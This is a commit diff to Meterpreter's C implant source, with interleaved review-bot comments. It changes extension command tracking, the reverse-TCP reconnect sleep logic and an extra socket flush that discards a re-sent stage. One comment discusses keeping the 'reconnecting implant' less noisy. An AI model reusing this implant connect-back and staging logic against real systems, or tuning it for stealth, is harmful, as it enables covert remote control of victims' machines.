Fix posix extension tracking and transport sleeps
This changeset fixes an issue with POSIX failing to keep track of loaded extensions properly. The timeout calculations for the reconnect wait were trying to be too clever and have been simplified. A second flush was also added when reconnecting so that the body of the second metsrv instance is ignored by the POSIX side. In future, when stageless meterpreter works with POSIX, this will no longer be necessary.
This commit is contained in:
parent
83f82f3129
commit
1d6e87180a
@ -80,10 +80,10 @@ DWORD request_core_loadlib(Remote *remote, Packet *packet)
|
||||
if (pExtension->init)
|
||||
{
|
||||
dprintf("calling InitServerExtension");
|
||||
pExtension->end = first;
|
||||
res = pExtension->init(remote);
|
||||
pExtension->start = extensionCommands;
|
||||
pExtension->getname = dlsym(library, "GetExtensionName");
|
||||
|
||||
|
||||
pExtension->deinit = dlsym(library, "DeinitServerExtension");
|
||||
|
||||
if (pExtension->getname)
|
||||
@ -99,7 +99,7 @@ DWORD request_core_loadlib(Remote *remote, Packet *packet)
|
||||
|
||||
if (response)
|
||||
{
|
||||
for (command = extensionCommands; command != first; command = command->next)
|
||||
for (command = pExtension->start; command != pExtension->end; command = command->next)
|
||||
{
|
||||
packet_add_tlv_string(response, TLV_TYPE_METHOD, command->method);
|
||||
}
|
||||
|
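Review bot: `pExtension->start = extensionCommands;` is recorded right after `pExtension->init(remote)` returns, but `res` is not checked first, so an extension whose init fails (or registers only part of its commands) still gets a start/end window over the global command list, and the response loop in the second hunk will advertise those commands to the handler. Consider only recording the window on success, `if (res == ERROR_SUCCESS) { pExtension->start = extensionCommands; }`, or clearing start/end on failure — though request_core_loadlib continues outside these hunks and may already bail on `res` before the response is built. The `[start, end)` walk also assumes command registration prepends to the head of `extensionCommands`, so that the pre-init head saved in `end` is reachable from `start`; if a registration ever inserted elsewhere, the loop would run off the end of the list and dereference NULL through `command->next`. A comment on the `pExtension->end = first;` line stating that invariant, e.g. `// snapshot the pre-init list head: init() prepends, so [start, end) is exactly this extension's commands`, would make the dependency visible before someone breaks it.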
@ -46,6 +46,7 @@ BOOL ext_cmd_callback(LPVOID pState, LPVOID pData)
|
||||
{
|
||||
packet_add_tlv_string(pEnum->pResponse, TLV_TYPE_STRING, command->method);
|
||||
}
|
||||
dprintf("[LISTEXT] Finished listing extension: %s", pExt->name);
|
||||
|
||||
return TRUE;
|
||||
}
|
||||
|
@ -17,7 +17,7 @@ MetsrvConfigData global_config =
|
||||
.proxy_username = "METERPRETER_USERNAME_PROXY\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00",
|
||||
.proxy_password = "METERPRETER_PASSWORD_PROXY\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00",
|
||||
.ssl_cert_hash = "METERPRETER_SSL_CERT_HASH\x00\x00\x00",
|
||||
.timeouts.placeholder = "METERP_TIMEOUTS\x00"
|
||||
.timeouts.values = { .expiry = 24*3600*7, .comms = 300, .retry_total = 3600, .retry_wait = 10 }
|
||||
};
|
||||
|
||||
#define SetHandleInformation(a, b, c)
|
||||
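Review bot: Whichever side of this hunk survives (the missing comma after `"METERP_TIMEOUTS\x00"` shows the two `.timeouts.*` lines cannot both be live), the units and meaning of the `.timeouts.values` fields are undocumented at the only place they are set: `retry_total` and `retry_wait` are compared against `current_unix_timestamp()` deltas and passed to `sleep()` / `Sleep(x * 1000)` in the transport hunks below, so they are seconds, and a `retry_wait` larger than `retry_total` still yields exactly one connect attempt because those loops are do/while. A comment such as `// seconds: expiry, comms, retry_total (reconnect window), retry_wait (pause between attempts)` would pin that down; `expiry` and `comms` are not exercised anywhere in this diff, so their descriptions should be confirmed against the code that reads them. If the POSIX binary is patched in place by searching for the `METERP_TIMEOUTS` marker, as the `placeholder` member suggests, initialising `.values` instead removes that marker from the image, which is worth confirming against the patching side before relying on it.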
@ -40,6 +40,7 @@ static DWORD reverse_tcp_run(SOCKET reverseSocket, struct sockaddr* sockAddr, in
|
||||
{
|
||||
DWORD result = ERROR_SUCCESS;
|
||||
int start = current_unix_timestamp();
|
||||
|
||||
do
|
||||
{
|
||||
int retryStart = current_unix_timestamp();
|
||||
@ -55,11 +56,7 @@ static DWORD reverse_tcp_run(SOCKET reverseSocket, struct sockaddr* sockAddr, in
|
||||
}
|
||||
|
||||
dprintf("[TCP RUN] Connection failed, sleeping for %u s", retryWait);
|
||||
int waited = current_unix_timestamp() - retryStart;
|
||||
if ((DWORD)waited < retryWait)
|
||||
{
|
||||
sleep((retryWait - (DWORD)waited) * 1000);
|
||||
}
|
||||
sleep(retryWait);
|
||||
} while (((DWORD)current_unix_timestamp() - (DWORD)start) < retryTotal);
|
||||
|
||||
if (result == SOCKET_ERROR)
|
||||
@ -168,11 +165,7 @@ static DWORD reverse_tcp6(const char* host, const char* service, ULONG scopeId,
|
||||
}
|
||||
|
||||
dprintf("[TCP RUN] Connection failed, sleeping for %u s", retryWait);
|
||||
int waited = current_unix_timestamp() - retryStart;
|
||||
if ((DWORD)waited < retryWait)
|
||||
{
|
||||
sleep((retryWait - (DWORD)waited) * 1000);
|
||||
}
|
||||
sleep(retryWait);
|
||||
} while (((DWORD)current_unix_timestamp() - (DWORD)start) < retryTotal);
|
||||
|
||||
closesocket(socketHandle);
|
||||
@ -886,6 +879,15 @@ static BOOL configure_tcp_connection(Remote* remote, SOCKET sock)
|
||||
dprintf("[SERVER] Flushing the socket handle...");
|
||||
server_socket_flush(remote);
|
||||
|
||||
// TODO: remove this when stageless stuff happens.
|
||||
// if we've just "reconnected" then we're going to flush
|
||||
// the socket a second time beacuse the second stage is
|
||||
// coming down and we don't want it!
|
||||
if (ctx->sock_desc_size > 0)
|
||||
{
|
||||
server_socket_flush(remote);
|
||||
}
|
||||
|
||||
dprintf("[SERVER] Initializing SSL...");
|
||||
if (server_initialize_ssl(remote))
|
||||
{
|
||||
|
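Review bot: The second `server_socket_flush(remote)` discards whatever is readable on the socket when `ctx->sock_desc_size > 0`, on the stated assumption that the handler is pushing a second metsrv stage that must be skipped; nothing checks that the stage has actually arrived in full, so if it is still in flight when the flush runs, or is larger than a single drain, the remainder is handed to `server_initialize_ssl` and the TLS handshake fails or desyncs — how likely that is depends on what server_socket_flush does, which is outside this diff. Until the stageless path lands, the comment should at least record the failure mode and the dependency, e.g. `// assumes the whole second stage is already buffered; a partial arrival leaves stage bytes in front of the TLS handshake`. The same comment has a typo (`beacuse`). configure_tcp_connection starts and ends outside this hunk.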
@ -47,11 +47,7 @@ static DWORD reverse_tcp_run(SOCKET reverseSocket, SOCKADDR* sockAddr, int sockA
|
||||
}
|
||||
|
||||
dprintf("[TCP RUN] Connection failed, sleeping for %u s", retryWait);
|
||||
int waited = current_unix_timestamp() - retryStart;
|
||||
if ((DWORD)waited < retryWait)
|
||||
{
|
||||
Sleep((retryWait - (DWORD)waited) * 1000);
|
||||
}
|
||||
Sleep(retryWait * 1000);
|
||||
} while (((DWORD)current_unix_timestamp() - (DWORD)start) < retryTotal);
|
||||
|
||||
if (result == SOCKET_ERROR)
|
||||
@ -168,11 +164,7 @@ static DWORD reverse_tcp6(const char* host, const char* service, ULONG scopeId,
|
||||
}
|
||||
|
||||
dprintf("[TCP RUN] Connection failed, sleeping for %u s", retryWait);
|
||||
int waited = current_unix_timestamp() - retryStart;
|
||||
if ((DWORD)waited < retryWait)
|
||||
{
|
||||
Sleep((retryWait - (DWORD)waited) * 1000);
|
||||
}
|
||||
Sleep(retryWait * 1000);
|
||||
} while (((DWORD)current_unix_timestamp() - (DWORD)start) < retryTotal);
|
||||
|
||||
closesocket(socketHandle);
|
||||
|
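Review bot: With the `waited` computation removed, `retryStart` (declared above this hunk at the top of the loop body, if this function mirrors the POSIX `reverse_tcp_run` where `int retryStart = current_unix_timestamp();` is visible) has no remaining use in reverse_tcp_run or reverse_tcp6 and should be deleted to avoid an unused-variable warning. `Sleep(retryWait * 1000)` also multiplies in DWORD, so a configured `retry_wait` of 4294968 s or more wraps to a short sleep, and `retry_wait == 0` gives `Sleep(0)`, i.e. back-to-back connect attempts for the whole `retryTotal` window, which is noisy for a reconnecting implant. A clamp before the sleep, e.g. `Sleep(max(1, min(retryWait, 3600)) * 1000)`, would bound both ends. Both functions start and end outside these hunks.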